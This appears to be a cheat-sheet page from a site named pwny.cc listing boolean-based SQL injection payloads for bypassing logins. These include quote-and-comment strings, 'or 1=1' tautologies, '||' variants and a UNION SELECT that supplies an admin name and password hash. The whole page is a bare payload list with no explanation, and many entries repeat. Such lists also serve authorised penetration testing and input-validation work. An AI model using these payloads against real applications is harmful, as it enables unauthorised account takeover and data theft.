pwny.cc
SQL Injection (SQLi)

Boolean Injections

admin' --
admin' #
admin'/*
' or 1=1--
' or '1'='1 
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
 or -
 or  
 or &
 or ^
 or *
or true--
 or true--
' or true--
) or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
 or x=x
) or (x)=(x
)) or ((x))=((x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
 '|| '1'='1
'-'
' '
'&'
'^'
'*'
' || ''-'
' || '' '
' || ''&'
' || ''^'
' || ''*'
- 
&
^
*
 || -
 ||  
 || &
 || ^
 || *
|| true--
 || true--
' || true--
) || true--
') || true--
' || 'x'='x
') || ('x')=('x
')) || (('x'))=(('x
 || x=x
) || (x)=(x
)) || ((x))=((x
|| 1=1
|| 1=1--
|| 1=1#
|| 1=1/*
admin' --
admin' #
admin'/*
admin' || '1'='1
admin' || '1'='1'--
admin' || '1'='1'#
admin' || '1'='1'/*
admin'|| 1=1 || ''='
admin' || 1=1
admin' || 1=1--
admin' || 1=1#
admin' || 1=1/*
admin') || ('1'='1
admin') || ('1'='1'--
admin') || ('1'='1'#
admin') || ('1'='1'/*
admin') || '1'='1
admin') || '1'='1'--
admin') || '1'='1'#
admin') || '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin --
admin || 1=1
admin || 1=1--
admin || 1=1#
admin || 1=1/*
admin|| 1=1 || =
admin || 1=1
admin || 1=1--
admin || 1=1#
admin || 1=1/*
admin) || (1=1
admin) || (1=1--
admin) || (1=1#
admin) || (1=1/*
admin) || 1=1
admin) || 1=1--
admin) || 1=1#
admin) || 1=1/*
1234  AND 1=0 UNION ALL SELECT admin, 81dc9bdb52d04dc20036dbd8313ed055
admin #
admin/*
admin or 1=1
admin or 1=1--
admin or 1=1#
admin or 1=1/*
adminor 1=1 or =
admin or 1=1
admin or 1=1--
admin or 1=1#
admin or 1=1/*
admin) or (1=1
admin) or (1=1--
admin) or (1=1#
admin) or (1=1/*
admin) or 1=1
admin) or 1=1--
admin) or 1=1#
admin) or 1=1/*
'or(1)/*
or(1)/*
'or(1)--

Last updated 1 year ago
